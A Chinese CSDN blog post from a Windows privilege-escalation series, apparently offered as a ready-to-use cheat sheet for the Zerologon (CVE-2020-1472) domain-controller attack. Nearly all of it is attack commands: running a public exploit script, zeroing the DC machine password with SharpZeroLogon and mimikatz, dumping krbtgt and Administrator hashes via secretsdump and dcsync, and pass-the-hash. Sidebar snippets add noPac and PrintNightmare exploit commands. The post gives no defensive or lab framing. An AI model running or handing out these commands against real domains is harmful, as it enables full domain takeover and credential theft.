WEB渗透Win提权篇-CVE-2020-1472

已于 2024-08-29 11:00:44 修改
阅读量224 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 网络安全 WEB安全 WEB渗透 提权
于 2024-08-29 10:51:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141673078
版权

 提权工具合集包(免费分享): 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-CSDN博客

WEB渗透Win提权篇-RDP&Firewall-CSDN博客

WEB渗透Win提权篇-MSSQL-CSDN博客

WEB渗透Win提权篇-MYSQL-udf-CSDN博客

WEB渗透Win提权篇-AccountSpoofing-CSDN博客

WEB渗透Win提权篇-弱权限提权-CSDN博客

WEB渗透Win提权篇-PowerUp-CSDN博客

WEB渗透Win提权篇-特权文件写入提权-CSDN博客

WEB渗透Win提权篇-MSF提权-CSDN博客

WEB渗透Win提权篇-CVE-2020-1472-CSDN博客 

WEB渗透Win提权篇-白名单提权-CSDN博客

 

检测
crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon

cve-2020-1472-exploit.py- Python 脚本
git clone https://github.com/dirkjanm/CVE-2020-1472.git

激活一个虚拟环境来安装impacket

>python3 -m venv venv
>source venv/bin/activate
>pip3 install .
>proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5

查找 DC 的旧 NT 哈希

>proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'

从 secretsdump 恢复密码 将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码(十六进制编码)

python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
deactivate
nccfsas- Cobalt Strike 的执行程序集的 .NET 二进制文件
>git clone https://github.com/nccgroup/nccfsas

检查

>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local

重置机器账户密码

>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset

从一个没加入域的机器测试

>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch

Mimikatz- 2.2.0 20200917 zerologon
privilege::debug

检查

lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$

执行,并且设置密码为空

lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit

执行dcsync导出hash

lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
PTH
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN

使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM 重置密码为Waza1234/Waza1234/Waza1234/

# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
lsadump::postzerologon /target:10.10.10.10 /account:DC01$
Pluto-2003
关注
专栏目录
WEB渗透Win提权-提权工具合集
qq_59468567的博客
08-26 2669
要运⾏ PowerUp,请启动 PowerShell 会话并使⽤ dot 加载脚本,请执⾏以下操。winPEAS 是⼀个⾮常强⼤的⼯具,它不仅积极寻找特权升级错误配置,⽽且还在。当使⽤命令⾏时,我们有 使⽤仍具有 /accepteula 命令⾏的旧版本选项。缺点是:程序的最新版本会⽣成⼀个 GUI"接受 EULA" 弹出窗⼝。您可以使⽤它来检查⽤户或组是否有权访问⽂件,⽬录,服务和注册表项。accesschk 是⼀个很旧的⼯具了,但我们依然可以尝试去⽤。Seatbelt 是⼀种枚举⼯具。
WEB渗透Win提权-Searchsploit
qq_59468567的博客
08-30 691
wmic qfe list full|findstr /i hotfix systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"||
WEB渗透Win提权-白名单提权
qq_59468567的博客
08-29 207
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe /unsafe C:\Users\y\Desktop\1.cs using System; using System.Net; using System.Linq; using System.Net.Sockets; us
WEB渗透Win提权-PrintNightmare
qq_59468567的博客
08-30 729
https://github.com/cube0x0/CVE-2021-1675 >python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' >python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' 本地执行溢出 >SharpPri
WEB渗透Win提权-弱权限提权
qq_59468567的博客
08-26 259
提权工具合集包: 夸克网盘分享WEB渗透Win提权-提权工具合集-CSDN博客WEB渗透Win提权-RDP&Firewall-CSDN博客WEB渗透Win提权-MSSQL-CSDN博客WEB渗透Win提权-MYSQL-udf-CSDN博客WEB渗透Win提权-AccountSpoofing-CSDN博客条件:服务帐号 upnphost 如果由于缺少依赖项而失败,请尝试以下命令。 使用accesschk 弱注册表权限 检查有KEY_ALL_ACCESS权限的注册表项 查询路
WEB渗透Win提权-AccountSpoofing
qq_59468567的博客
08-25 284
https://github.com/cube0x0/noPac >noPac.exe scan -domain htb.local -user user -pass 'password123' >noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt >noPac.exe -
WEB渗透Win提权-特权文件写入提权
qq_59468567的博客
08-28 171
此技巧不再适用于最新版本的 Windows 10 Insider Preview 如果我们在 Windows 或某些第三方软件中发现了一个特权文件写入漏洞,可以将我们自己的windowscoredeviceinfo.dll复制到C:\Windows\Sytem32\,然后由 USO 服务加载,以NT AUTHORITY\System执行任意代码 构建https://github.com/itm4n/UsoDllLoader 选择发布配置和 x64 架构。 构建解决方案。 DLL .\x64\Release\
WEB渗透Win提权-合集(下)
qq_59468567的博客
09-01 471
使用cmdkey列出机器上存储的凭据 >cmdkey /list Currently stored credentials: Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator 可以使用runas的/savecred参数以使用保存的凭据。以下示例通过 SMB 共享调用远程可执行文件 >runas /savecred /user:WORKGROUP\A
内网渗透:八、CVE-2020-1472 NetLogon 域内提权漏洞(域控密码置空)
liu_jia_liang的博客
03-08 5235
简介: 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。 Netlogon远程协议是一个可用的在Windows域控制器上的RPC(remote pr...
[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
热门推荐
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一文章,希望对您有所帮助。这文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
[ vulhub漏洞复现 ] Apache Flink目录遍历(CVE-2020-17519)
qq_51577576的博客
09-26 3432
[ vulhub漏洞复现 ] Apache Flink目录遍历 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件读取。
struts2 CVE-2020-17530漏洞复现
Armandhe的博客
06-08 920
我丝毫不敢休息,又肝了一
[ vulhub漏洞复现 ] Struts2 远程命令执行漏洞(CVE-2020-17530)(S2-061)
qq_51577576的博客
08-22 691
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
Web安全 -- CVE-2016-10033漏洞
redBu1l的博客
12-10 4053
引言CVE-2016-10033漏洞背景独立研究人员Dawid Golunski发现该漏洞—远程攻击者利用该漏洞,可实现远程任意代码在web服务器上执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反悔表单、注册表单中 ,邮件密码重置表单等使用发送的组建时利用此漏洞。漏洞影响的版本PHPMailer < 5.2.18环境搭建模拟如图网络环境web服务器配置web服务器的系统为cent
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8486
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于MATLAB的肤色的人数统计系统,以地铁车厢为实际背景,通过预测的方式,结合肤色统计人脸得到车厢人数,从而估计拥挤度
最新发布
10-04
【作品名称】:基于MATLAB的肤色的人数统计系统,以地铁车厢为实际背景,通过预测的方式,结合肤色统计人脸得到车厢人数,从而估计拥挤度 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:该课题为基于MATLAB的肤色的人数统计系统,以地铁车厢为实际背景,通过预测的方式,结合肤色统计人脸得到车厢人数,从而估计拥挤度,将结果反馈给车站里的视频,让乘客得知每节车厢的拥挤程度,从而合理分配车厢乘客,避免资源浪费和拥挤,本设计带有一个GUI交互界面。是一个人数统计类课题,该课题可以应用于教室人数统计,十字路口行人统计等等方面。 【资源声明】:本资源作为“参考资料”而不是“定制需求”,代码只能作为参考,不能完全复制照搬。需要有一定的基础能够看懂代码,能够自行调试代码并解决报错,能够自行添加功能修改代码。
LabVIEW 入门教程:从零开始掌握图形化编程
10-04
亲爱的工程师和技术爱好者们, 您是否想学习一种强大的图形化编程语言,以便在自动化、数据采集、测试测量等领域大展身手?LabVIEW 是您的最佳选择!我们为您精心准备了一份全面的 LabVIEW 入门教程,帮助您从零开始,逐步掌握这门强大的工具。 为什么选择 LabVIEW? 直观易学:图形化编程界面,无需编写复杂的代码。 广泛应用:适用于工业自动化、数据采集、仪器控制、图像处理等多个领域。 强大功能:内置丰富的函数库和工具包,满足各种复杂需求。 社区支持:庞大的用户社区和丰富的在线资源,助您解决各种问题。 本教程适合谁? 初学者:从未接触过 LabVIEW 的新手。 工程师:希望提升技能,提高工作效率的专业人士。 学生:对自动化和测试测量感兴趣的在校学生。 研究人员:需要进行数据采集和分析的研究人员。 课程内容 LabVIEW 基础:安装与配置、界面介绍、基本概念。 图形化编程:创建 VI(虚拟仪器)、使用控件和指示器。 数据流编程:理解数据流的概念,编写简单的程序。 常用函数库:了解并使用常用
吉林农业科技学院在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-04
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值